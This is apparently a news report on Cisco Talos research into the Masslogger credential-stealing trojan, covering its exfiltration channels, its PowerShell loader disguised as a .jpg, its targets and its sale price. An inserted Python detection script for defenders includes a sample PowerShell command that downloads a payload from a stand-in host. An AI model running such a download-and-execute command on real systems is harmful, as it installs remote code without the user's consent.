
Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos
2021-02-18 07:25

Cisco Talos has uncovered a credential-stealing trojan that lifts your login details from the Chrome browser, Microsoft's Outlook and instant messengers.

Cisco Talos added: "Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application."

The second stage of the infection is a PowerShell script (a common technique) that loads the main Masslogger loader from compromised legitimate hosts, where it is stored disguised as a .jpg file.
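As an added illustration of the defender's side of the second stage described above (this is not code from the article or from Talos), the following Python flags process-creation events in which a PowerShell host fetches a URL whose path looks like an image file. The key=value log layout, the hosts, paths and command lines are all constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed Sysmon-style process-creation events (not taken from the article).
# Events 0 and 1 mimic the described chain: a PowerShell second stage pulling a
# payload that is named like an image. Events 2 and 3 are benign look-alikes.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -c (New-Object Net.WebClient).DownloadString('
    "'http://compromised.example/img/banner.jpg')\"",
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell Invoke-WebRequest https://cdn.example/photo.JPG -OutFile x"',
    'Image="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
    'CommandLine="chrome.exe https://news.example/pic.jpg"',
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell Get-ChildItem C:\\Users\\alice\\Pictures\\*.jpg"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.IGNORECASE)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")


def parse_event(line: str) -> Dict[str, str]:
    """Split one key="value" log line into a field dictionary."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def flag_remote_image_fetch(event: Dict[str, str]) -> Optional[str]:
    """Return the suspicious URL if a script host fetches an image-named resource."""
    image = event.get("Image", "").lower()
    if not image.endswith(SCRIPT_HOSTS):
        return None  # browsers and other processes legitimately load images
    for url in URL_RE.findall(event.get("CommandLine", "")):
        path = url.split("?", 1)[0]  # ignore any query string
        if path.lower().endswith(IMAGE_EXT):
            return url
    return None


def hunt(lines: List[str]) -> List[Tuple[int, str]]:
    """Run the check over a batch of log lines; return (index, url) hits."""
    hits = []
    for idx, line in enumerate(lines):
        url = flag_remote_image_fetch(parse_event(line))
        if url:
            hits.append((idx, url))
    return hits


if __name__ == "__main__":
    for idx, url in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: script host fetched image-named URL {url}")
```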

Talos said the malicious folk behind Masslogger were mostly targeting southern and eastern European countries: "Based on the combination of discovered emails and file names, we believe it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening in several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain."

Masslogger is not an entirely new creation of the malware industry: Talos pointed to previous research by infosec chap Fred HK. He attributed it to a malware underground persona who goes by the handle of NYANxCAT. Prices for Masslogger were apparently $30 for three months or $50 for a lifetime licence.

Cisco's analysis showed that Masslogger "is almost entirely executed and present only in memory", the only components written to disk being the email attachment and the HTML help file.


News URL

https://go.theregister.com/feed/www.theregister.com/2021/02/18/masslogger_cisco_talos_research/
